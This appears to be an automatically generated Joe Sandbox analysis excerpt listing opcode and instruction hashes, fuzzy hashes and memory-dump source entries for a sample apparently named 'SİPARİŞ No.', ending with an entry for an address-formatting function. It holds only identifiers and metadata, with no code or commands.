                                                                  • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                  • Instruction ID: 245e22bc4816c5abdf1a51d5da2fbaeb36cb92efa86806dd86e981549c3c4e5f
                                                                  • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                  • Instruction Fuzzy Hash: 44D0C939212E80CFD30ACF08C5A0B1633B4BB44B85FC14490E841CBB62DE6CD940CE00
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                                  • Instruction ID: 1566ddcafad30b3f2789d915ac668f17d6c4e4d1e12fc78538f3babd0e1307b5
                                                                  • Opcode Fuzzy Hash: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                                  • Instruction Fuzzy Hash: 2BD01779945AC48FE717CB04C161B807BF4FB05B40F850098E08347BA2C67C9984CB00
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                  • Instruction ID: 878cbc163e34227a1a1bfd318820e401283bad48a5ead43b27812693c9af8ec2
                                                                  • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                  • Instruction Fuzzy Hash: CEC08C33290688AFC712EF98CD01F027BA9EB98B40F500021F3048BA70CA71FD60EA94
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                  • Instruction ID: 15f30d546fb612046fe2e23f0bc4333c1efebb9f1f011ec8954647eefec40fe1
                                                                  • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                  • Instruction Fuzzy Hash: BDD01236100248EFCB01DF41D890D9A772AFBC8750F148019FD19077108A71ED62DA50
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                  • Instruction ID: 4441626dd4f33e3af42c1af6ed708349a455b97b4aa54801d77b60e2a75d8e8e
                                                                  • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                  • Instruction Fuzzy Hash: 05C04879B01A418FDF06CB2AD294F4977E8FB44780F290890F905CBB21EB64E801CA21
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 79baad3f17e5b4747c785e985f5bce35f4709b40d3b98e1fb853b8add1eec420
                                                                  • Instruction ID: a95e272a0248d6dc3db82a50bfccd6056968af44fac30e1071e83127a4ef749a
                                                                  • Opcode Fuzzy Hash: 79baad3f17e5b4747c785e985f5bce35f4709b40d3b98e1fb853b8add1eec420
                                                                  • Instruction Fuzzy Hash: 44900231649804229240725859C4546400657E0301B55C012E0428638CCA248A5A5361
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 20ea6c5d123eeaf228d4877204cf3681906686f2eff5a920bcf89a64baeb995c
                                                                  • Instruction ID: 3fcb64d0e0fdc14f680afc5a3e8459470938a9928970d19e521aa804f386663d
                                                                  • Opcode Fuzzy Hash: 20ea6c5d123eeaf228d4877204cf3681906686f2eff5a920bcf89a64baeb995c
                                                                  • Instruction Fuzzy Hash: CE90022128540C12D24072589554707000787D0701F55C012A0028638DC6268A6966B1
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cf9da9fa3744ca57073118b38113151d9721ec5d6a9d9dc418dd856f05404df7
                                                                  • Instruction ID: d812eddaabac5dca74b26e352fe663d8451b2071c410f6d7fd2628ee6e714e64
                                                                  • Opcode Fuzzy Hash: cf9da9fa3744ca57073118b38113151d9721ec5d6a9d9dc418dd856f05404df7
                                                                  • Instruction Fuzzy Hash: C890022124584852D24073585944B0F410647E1302F95C01AA415A638CC92589595721
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 348ce85059c3832d31829f8a5136147ecb30b27627921727461e16a8975edbc3
                                                                  • Instruction ID: d2038a126061c85ab2e8508ca87fa17aea33271c1c7e8bb8643c42370e54ce86
                                                                  • Opcode Fuzzy Hash: 348ce85059c3832d31829f8a5136147ecb30b27627921727461e16a8975edbc3
                                                                  • Instruction Fuzzy Hash: B390026164550452424072585944406600657E1301395C116A0558634CC62889599269
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 283a736f5028cf9249325b566cc627dedb727f415d5853e40297abab01c1de5a
                                                                  • Instruction ID: 3c8986ed16eca59fd575ff478578b6cde1dd610ad183842fe783c24bce5925ff
                                                                  • Opcode Fuzzy Hash: 283a736f5028cf9249325b566cc627dedb727f415d5853e40297abab01c1de5a
                                                                  • Instruction Fuzzy Hash: B1900435355404130305F75C1744507004747D5351355C033F101D734CD731CD755131
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 65f3c858b2a9341a4b813434961b1b415506b24d2ea3ec5e65bcdc61f9d83a05
                                                                  • Instruction ID: 826b1c1346e759b71aad0a1c83502d2c1c70b2dd989a9ecbfd467b693e397956
                                                                  • Opcode Fuzzy Hash: 65f3c858b2a9341a4b813434961b1b415506b24d2ea3ec5e65bcdc61f9d83a05
                                                                  • Instruction Fuzzy Hash: 1A900225265404120245B658174450B044657D6351395C016F141A674CC63189695321
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0a842127b724ca194318433902b9f94d41d2b6e4c87854e7e206e708eed4cf9a
                                                                  • Instruction ID: e9ccb1603c211d9f0f46d373cf29906630768b59527f08f623b39ef8689d027d
                                                                  • Opcode Fuzzy Hash: 0a842127b724ca194318433902b9f94d41d2b6e4c87854e7e206e708eed4cf9a
                                                                  • Instruction Fuzzy Hash: 309002A1245544A24600B3589544B0A450647E0301B55C017E1058634CC53589559135
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1f2a0c99669accf3b1a7ce49f09b50ad8ca5dc87992ade2ca0744c562176a5ef
                                                                  • Instruction ID: 7723b08407ae4b891af65c5333f375397033b88e2b194250c6e5ee0aee9711da
                                                                  • Opcode Fuzzy Hash: 1f2a0c99669accf3b1a7ce49f09b50ad8ca5dc87992ade2ca0744c562176a5ef
                                                                  • Instruction Fuzzy Hash: 1D90023124540C12D2807258554464A000647D1301F95C016A0029738DCA258B5D77A1
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5a2359e6dd9811a432b5220b2c8c5c03e008f8b38d4048aeb1b674c27d9bec4c
                                                                  • Instruction ID: 21695da866bb889b30f0d02fdc025499c4036c3f5d4ec34a425f23fca70fe165
                                                                  • Opcode Fuzzy Hash: 5a2359e6dd9811a432b5220b2c8c5c03e008f8b38d4048aeb1b674c27d9bec4c
                                                                  • Instruction Fuzzy Hash: AB90023124944C52D24072585544A46001647D0305F55C012A0068778DD6358E59B661
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 69e071a0cbd0fe6b05855548aa1e0e1bb9248b99bfefcaed29430e9958d51204
                                                                  • Instruction ID: fd90ab7266c8f8a6a516703559c5534842d2a555d52f020adc1b3221597d905d
                                                                  • Opcode Fuzzy Hash: 69e071a0cbd0fe6b05855548aa1e0e1bb9248b99bfefcaed29430e9958d51204
                                                                  • Instruction Fuzzy Hash: 2090023124540C12D20472585944686000647D0301F55C012A6028739ED67589957131
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0d3dfb556a108271a0d6d7c8fafc5bd311d6644a6a9f1d2408d6462eecd9ac2e
                                                                  • Instruction ID: eda04740f5238774c3b7d652d7ae474b91f40e933db189c254c33cc16d562632
                                                                  • Opcode Fuzzy Hash: 0d3dfb556a108271a0d6d7c8fafc5bd311d6644a6a9f1d2408d6462eecd9ac2e
                                                                  • Instruction Fuzzy Hash: 9190023164940C12D25072585554746000647D0301F55C012A0028738DC7658B5976A1
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 60d1c82eea3397152aadb5f0a726d098786f7ce5ee80d1dd7daa8c15eb23e5ad
                                                                  • Instruction ID: 0e8eee78fa668f9e04564f3bfab4ddf977ddf1d0b64b5e09ea13a933609dbe9c
                                                                  • Opcode Fuzzy Hash: 60d1c82eea3397152aadb5f0a726d098786f7ce5ee80d1dd7daa8c15eb23e5ad
                                                                  • Instruction Fuzzy Hash: D690022128945512D250725C5544616400667E0301F55C022A0818678DC56589596221
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 184e7b1d5c89862dd008c12efe5e155d89f90db67ce46c0ab0b78e3c482be855
                                                                  • Instruction ID: 9e0cacd2d520f2ddcabf364a6c6f0fca18847b57f7a4c2da019cb125d0edda23
                                                                  • Opcode Fuzzy Hash: 184e7b1d5c89862dd008c12efe5e155d89f90db67ce46c0ab0b78e3c482be855
                                                                  • Instruction Fuzzy Hash: D090026124580813D24076585944607000647D0302F55C012A2068639ECA398D556135
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ed837c6b8e49af207bfa4cd16bf3c62a2d48359eaf6c4b8c15524a39904c44fb
                                                                  • Instruction ID: c2d5eb1f71acf56ffad7b38ba8ea4bbeca48418bfb4abd135d74f0de0c715601
                                                                  • Opcode Fuzzy Hash: ed837c6b8e49af207bfa4cd16bf3c62a2d48359eaf6c4b8c15524a39904c44fb
                                                                  • Instruction Fuzzy Hash: 0A90022164540912D20172585544616000B47D0341F95C023A1028639ECA358A96A131
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 111102d7c7467bfd07765587b7d681b53ba2e1790cdc54e14b6f35c6de71371c
                                                                  • Instruction ID: d43c012f7c141dfd8594f366fd2c5f86d13f33a1f2f85775e2b08772ce020419
                                                                  • Opcode Fuzzy Hash: 111102d7c7467bfd07765587b7d681b53ba2e1790cdc54e14b6f35c6de71371c
                                                                  • Instruction Fuzzy Hash: 0190027124540812D24072585544746000647D0301F55C012A5068638EC6698ED96665
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b4a350046b17eb054a4abdedd6c72c1953fc9bc8782c49b2a4b2bb371f1ff0ed
                                                                  • Instruction ID: ee0862fb0cd02dd3dcb8637b289b191c8966544f7a3d737bcf5f1d6be362687a
                                                                  • Opcode Fuzzy Hash: b4a350046b17eb054a4abdedd6c72c1953fc9bc8782c49b2a4b2bb371f1ff0ed
                                                                  • Instruction Fuzzy Hash: 8C90022134540812D20272585554606000A87D1345F95C013E1428639DC6358A57A132
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b4d688848baf38ebda7d1c4813a31de9d1840fdfb922ba284affc98f04d51053
                                                                  • Instruction ID: d95613a069b104f8d31e725a5f7ea130e765be19275dc8e7e04bac33dc063a0f
                                                                  • Opcode Fuzzy Hash: b4d688848baf38ebda7d1c4813a31de9d1840fdfb922ba284affc98f04d51053
                                                                  • Instruction Fuzzy Hash: 34900221255C0452D30076685D54B07000647D0303F55C116A0158638CC92589655521
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 89e93c893203d90f4efa64b8af1d87d0b365361248949351e1f3c3bea741068c
                                                                  • Instruction ID: 4a914aa07ec5e7a1e7176ec6d51708f1b4f511ac78cc99194413025c29b6078b
                                                                  • Opcode Fuzzy Hash: 89e93c893203d90f4efa64b8af1d87d0b365361248949351e1f3c3bea741068c
                                                                  • Instruction Fuzzy Hash: 8090023124580812D2007258595470B000647D0302F55C012A1168639DC63589556571
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d575ce0acc08156f5f809dde274ec058e984efb4af4399f7f07cc94762d2dec6
                                                                  • Instruction ID: 3e2f484e3c488ef3f9ef61e066063fbb300dcd1ee92cace0b5133a9fcc9602f7
                                                                  • Opcode Fuzzy Hash: d575ce0acc08156f5f809dde274ec058e984efb4af4399f7f07cc94762d2dec6
                                                                  • Instruction Fuzzy Hash: A79002216454045242407268998490640066BE1311755C122A099C634DC56989695665
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f9c8bb069e96fb685a1fd4fa3b871d09f55b0800410ad0296259458cfc6cb91a
                                                                  • Instruction ID: 1cdeee3bb3b08fa7f3e9fd9693f4545c179f1e63d889e07b752f3bf85f95eb10
                                                                  • Opcode Fuzzy Hash: f9c8bb069e96fb685a1fd4fa3b871d09f55b0800410ad0296259458cfc6cb91a
                                                                  • Instruction Fuzzy Hash: CA90023124580812D20072585948747000647D0302F55C012A5168639EC675C9956531
Control-flow Graph (rendered graph of the function starting at 32d72890 not reproduced)
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
• Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
• API String ID: 48624451-2108815105
• Opcode ID: f749d5bf8c09e8c615c1d9ad5e021897543d974aef27f1c1b459bcf156511642
